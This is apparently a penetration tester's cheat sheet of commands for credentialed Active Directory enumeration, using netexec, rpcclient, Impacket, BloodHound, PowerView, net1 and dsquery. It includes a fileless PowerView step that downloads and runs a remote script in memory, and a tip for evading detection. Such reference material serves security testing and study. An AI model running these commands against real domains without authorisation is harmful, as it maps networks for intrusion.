PRIMARY CATEGORY → WINDOWS RECONAISSANCE
Components ⟡
Components ⟡
Tools
Credentialed Enumeration - UNIX-like
Netexec
Users
nxc smb <TARGET> --username '<USER>' --password '<PASSWD>' --users | awk -v IGNORECASE=1 '/-Username-/ { v = 1 ; next } !/\[\*\]/ && v { print $5 }'Groups
nxc smb <TARGET> --username '<USER>' --password '<PASSWD>' --groupsLogged on Users
nxc smb <TARGET> --username '<USER>' --password '<PASSWD>' --loggedon-usersRPCClient
Users
SAMR
rpcclient --user '<USER>%<PASSWD>' --command 'enumdomusers' <TARGET> | grep -ioP --color -- '^user:\[\K.*?(?=\])'Groups
SAMR
rpcclient --user '<USER>%<PASSWD>' --command 'enumdomgroups' <TARGET> | grep -ioP --color -- '^group:\[\K.*?(?=\])'Users & Groups
LSARPC
RID Cycling
for _rid in {500..1500} ; do rpcclient --user '<USER>%<PASSWD>' --command "lookupsids <DOMAIN_SID>-$_rid" <DC> ; done | awk -v IGNORECASE=1 '!/unknown/ { gsub(/.+\\/,"", $2) ; print $2 }'Lpdasearch
Users
ldapsearch -LLL -x -H 'ldap://<TARGET>' -D '<USER>@<DOMAIN>' -w '<PASSWD>' -b 'DC=<DOMAIN>,DC=<TLS>' '(ObjectClass=User)' samAccountName dn userPrincipalName cn | grep -vPi --color -- '^#.+$'Groups
ldapsearch -LLL -x -H 'ldap://<TARGET>' -D '<USER>@<DOMAIN>' -w '<PASSWD>' -b 'DC=<DOMAIN>,DC=<TLD>' '(ObjectClass=Group)' samAccountName dn userPrincipalName cn | grep -vPi --color -- '^#.+$'Impacket’s GetADUsers.py
Users
GetADUsers.py -dc-ip <DC> -all '<DOMAIN>/<USER>:<PASSWD>' 2> /dev/null | awk '/-{3,}/ { v=1 ; next } v { print $1 }'Impacket’s GetADComputers.py
GetADComputers.py -dc-ip '<DC_IP>' -dc-host '<DC_FQDN>' -resolveIP '<DOMAIN>/<USER>:<PASSWD>' | grep -viP --color -- 'unable to resolve'Impacket’s Samrdump.py
Users
samrdump.py '<DOMAIN>/<USER>:<PASSWD>@<TARGET>' 2> /dev/null | awk -v IGNORECASE=1 '/AccountIsDisabled: False/ { print $1 }'Impacket’s Lookupsid.py
Users & Groups
lookupsid.py '<DOMAIN>/<USER>:<PASSWD>@<TARGET>'Windapsearch (Go version)
Users, Computers, Groups, GPOs and so on
Users
windapsearch --domain '<DOMAIN>' --dc '<TARGET>' --username '<USER>' --password '<PASSWD>' --module usersGroups
windapsearch --domain '<DOMAIN>' --dc '<TARGET>' --username '<USER>' --password '<PASSWD>' --module groupsLdapdomaindump.py
Users, Computers, Groups, GPOs and so on
Setup
git clone https://github.com/dirkjanm/ldapdomaindump ldapdomaindump
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install .Usage
mkdir domain_tld.data
cd !$ && python3 ldapdomaindump.py --user '<DOMAIN>\<USER>' --password '<PASSWD>' --no-grep --no-json '<TARGET>'python3 -m http.server <PORT>BloodHound.py
Setup
Intended for BH-CE Ingestion (Not BH-Legacy)
git clone https://github.com/dirkjanm/BloodHound.py BH.py
cd !$ && git checkout bloodhound-ce
python3 -m venv .venv
. !$/bin/activate && pip3 install .Usage
python3 bloodhound.py --collectionmethod All --domain '<DOMAIN>' --username '<USER>' --password '<PASSWD>' --nameserver '<DC_IP>' --domain-controller '<DC_FQDN>' --zipIf the UDP port 53 of the specified nameserver is not reachable, simply add the -dns-tcp flag to force DNS over TCP
python3 bloodhound.py --collectionmethod All --domain '<DOMAIN>' --username '<USER>' --password '<PASSWD>' --nameserver '<DC_IP>' --domain-controller '<DC_FQDN>' --zip --dns-tcpCredentialed Enumeration - Windows
AD Powershell Module
Setup
Import-Module ActiveDirectoryUsers
Get-ADUser
- All Domain User Accounts
Get-ADUser -Filter * | Select-Object samAccountName- Specific Domain User Account
Get-ADUsers -Identity <USER> # SamAccountNameGroups
Get-ADGroup
- All Domain Groups
Get-ADGroup -Filter * | Select-Object samAccountName- Specific Domain Group
Get-ADGroup -Identity <GROUP> # SamAccountNameGroup Membership
Get-ADGroupMember
Get-ADGroupMember -Identity 'Admins. del dominio'Domain Info.
GetADDomain
Get-ADDomainTrust Relationships
Get-ADTrust -Filter *Powerview
Setup
- Fileless
IEX (New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1')- Touching Disk
IWR -UseBasicParsing -Uri 'https://raw.githubusercontent.com/BC-SECURITY/Empire/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1' -OutFile '.\powerview.ps1'Import-Module .\powerview.ps1Users
Get-DomainUser
- All Domain User Accounts
Get-DomainUser -Identity * -Domain <DOMAIN> | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol- Specific Domain User Account
Get-DomainUser -Identity <USER> -Domain <DOMAIN> | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrolGroups
- All Domain Groups
Get-DomainGroup- Specific Domain Group
Get-DomainGroup -Identity '<GROUP>'Group Membership
Recursive i.e. Nested Group Membership Scope
Get-DomainGroupMember
Get-DomainGroupMember -Identity "Domain Admins" -RecurseTrust Relationships
Get-DomainTrustMapping
Get-DomainTrustMappingLocal Admin Access on a certain Domain-Joined Computer
Test-AdminAccess
Test-AdminAccess -ComputerName <TARGET>SharpHound
SharpHound.exe
CollectionMethod → All
Download it from BloodHound-{CE,Legacy} GUI
.\SharpHound.exe AllLiving off the Land
WMI
Net Command
Net1.exe for more OPSEC
- Local Users
net1 user # All Loca User Accounts
net1 user "<USER>" # Specific Local User Account- Domain Users
net1 user /domain # All Domain User Accounts
net1 user /domain "<USER>" # Specific Domain User Account- Local Groups
net1 localgroup # All Local Groups
net1 localgroup "<GROUP>" # Specific Local Group- Domain Groups
net1 group /domain # All Domain Groups
net1 group /domain "<GROUP>" # Specific Domain Group- Domain Password Policy
net1 accountsDSquery
Local privileges required
- Domain Users
dsquery user- Domain Computers
dsquery computer- Custom Search via LDAP Filters
dsquery * -Filter '<LDAP_FILTER>' -Attr '<ATTRIBUTES>'